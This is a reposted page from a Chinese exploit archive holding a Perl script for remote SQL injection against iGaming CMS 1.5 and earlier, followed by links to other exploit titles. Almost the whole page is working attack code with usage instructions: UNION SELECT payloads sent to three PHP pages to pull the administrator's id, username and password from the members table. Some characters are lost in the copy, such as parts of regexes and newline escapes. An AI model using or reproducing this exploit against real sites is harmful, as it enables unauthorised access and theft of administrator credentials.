手机
当前位置:查字典教程网 >网络安全 >Exploit >iGaming CMS
iGaming CMS
摘要:#!/usr/bin/perl#------------------------------------------------------...

#!/usr/bin/perl

# ----------------------------------------------------------

# iGaming <= 1.5 Multiple Remote SQL Injection Exploit

# Perl Exploit - Output: id:admin:password

# Discovered On: 23/09/2008

# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it

# Proud To Be Italian

# ----------------------------------------------------------

# Usage: perl exploit.pl http://localhost/iGaming

# ---------------------------------------------------------- use strict;

use LWP::UserAgent; my ($one,$two,$exec,$host,$http,$xxx,$view); $view = "' union select 0,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8 from sp_members WHERE id='1/*";

$exec = "' union select 1,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3 from sp_members where id='1/*";

$host = shift @ARGV;

$http = new LWP::UserAgent or die $!;

$http->agent("Mozilla/4.5 [en] (Win95; U)");

$http->timeout(1);

if($host !~ /^http://(. ?)$/)

{

print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploitn";

print "[?] Usage: perl $0 http://[path]n";

exit;

}

else

{

$one = $http->get($host.'/previews.php?browse='.$exec);

$two = $http->get($host.'/reviews.php?browse='.$exec);

$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);

if($one->is_success or $two->is_success or $xxx->is_success)

{

die "$1n" if $one->content =~ /%(. ?)%/;

die "$1n" if $two->content =~ /%(. ?)%/;

die "$1n" if $xxx->content =~ /%(. ?)%/;

}

else

{

die "[ ] Exploit Failed!n";

}

}

【iGaming CMS】相关文章:

Maian Weblog

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)

AuraCMS

Acoustica Mixcraft

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

Dana IRC 1.4a Remote Buffer Overflow Exploit

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

Maian Guestbook

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)

精品推荐
分类导航